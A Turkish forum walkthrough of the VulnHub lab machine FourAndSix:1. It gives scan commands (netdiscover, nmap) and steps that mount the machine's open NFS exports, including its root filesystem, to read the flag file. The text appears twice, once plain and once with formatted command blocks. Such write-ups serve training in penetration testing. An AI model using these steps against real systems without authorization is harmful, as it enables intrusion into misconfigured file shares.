- 30 Nis 2012
- 2,728
- 13
FourAndSix: 1 Zaafiyetli Makine Çözümü
FourAndSix:1 İndirme Linki;
Makinemizi açıyoruz bu şekilde bir görüntü geliyor karşımıza.
Makinemizi açtık ve her zamanki gibi IP taraması yapıyoruz.
IP adresimizi bulduk ve siteye girmeyi deniyoruz.Fakat siteye bağlantı sağlanmıyor.
Hemen vakit kaybetmeden açık port taraması yapıyoruz.Tarattığımız portlarda 2049 portu açık ve NFS yani ağ dosya sistemi buradan dosyalara erişebileceğimiz anlamına gelmektedir.
Aşağıda yaptığımız işlemler sırası ile ; Paylaşılan klasorün herkese açık olduğunu görüyoruz ve içindekileri görmek için /tmp dizinine bir klasor açıyoruz.Klasoru oluşturduktan sonra bilgilere erişmek için mount komutunu kullanıyoruz.En son olarakda içindeki çıkan bilgileri ekrana yazdırıyoruz.
Listeleme yaptıktan sonra bizi 8 tane hello.jpeg/png karışımı dosyalar bizi beklemekte merak edip ilgili dizine gidip görüntüleme yapıyoruz.
Böyle bir şey beklemediğim kesin idi
Kök dizinin paylaşıma açık olup olmadığını kontrol edelim.Eğer açık ise oradan birşeyler elde etme şansımız bu duruma bakılırsa çok yüksek.
Görüğümüz üzere proof.txt çıktı karşımıza büyük bir olasılık dahilinde flag karşımıza çıkacaktır.
Ve flag ... Kısa basit hoş daha çok NFS kullanıma yönelik bir CTF olmuş.
FourAndSix:1 İndirme Linki;
Kod:
[COLOR=silver]https://www.vulnhub.com/entry/fourandsix-1,236/[/COLOR]
Makinemizi açıyoruz bu şekilde bir görüntü geliyor karşımıza.
Makinemizi açtık ve her zamanki gibi IP taraması yapıyoruz.
Kod:
[COLOR=Silver]netdiscover[/COLOR]
IP adresimizi bulduk ve siteye girmeyi deniyoruz.Fakat siteye bağlantı sağlanmıyor.
Hemen vakit kaybetmeden açık port taraması yapıyoruz.Tarattığımız portlarda 2049 portu açık ve NFS yani ağ dosya sistemi buradan dosyalara erişebileceğimiz anlamına gelmektedir.
Kod:
[COLOR=Silver]nmap -sS -sV <adress>[/COLOR]
Aşağıda yaptığımız işlemler sırası ile ; Paylaşılan klasorün herkese açık olduğunu görüyoruz ve içindekileri görmek için /tmp dizinine bir klasor açıyoruz.Klasoru oluşturduktan sonra bilgilere erişmek için mount komutunu kullanıyoruz.En son olarakda içindeki çıkan bilgileri ekrana yazdırıyoruz.
Kod:
[COLOR=royalblue][COLOR=Silver]showmount -e <adress>[/COLOR][/COLOR]
[COLOR=Silver]cd /tmp[/COLOR]
[COLOR=Silver]mkdir <klasoradi>[/COLOR]
[COLOR=Silver]mount -t nfs <adress>:/shared /tmp/<klasoradi>[/COLOR]
[COLOR=Silver]cd <klasoradi>[/COLOR]
[COLOR=Silver]mkdir <klasoradi>[/COLOR]
[COLOR=Silver]mount USB-stick.img <klasoradi>[/COLOR]
[COLOR=Silver]cd <klasoradi>[/COLOR]
[COLOR=Silver]ls -la[/COLOR]
Listeleme yaptıktan sonra bizi 8 tane hello.jpeg/png karışımı dosyalar bizi beklemekte merak edip ilgili dizine gidip görüntüleme yapıyoruz.
Böyle bir şey beklemediğim kesin idi
Kök dizinin paylaşıma açık olup olmadığını kontrol edelim.Eğer açık ise oradan birşeyler elde etme şansımız bu duruma bakılırsa çok yüksek.
Kod:
[COLOR=royalblue][COLOR=Silver]mkdir root[/COLOR][/COLOR]
[COLOR=Silver]mount <adress>:/ root[/COLOR]
[COLOR=Silver]cd root[/COLOR]
[COLOR=Silver]ls -la[/COLOR]
[COLOR=Silver]cd root[/COLOR]
[COLOR=Silver]ls -la[/COLOR]
Görüğümüz üzere proof.txt çıktı karşımıza büyük bir olasılık dahilinde flag karşımıza çıkacaktır.
Kod:
[COLOR=silver]cat proof.txt[/COLOR]
Ve flag ... Kısa basit hoş daha çok NFS kullanıma yönelik bir CTF olmuş.
Son düzenleme: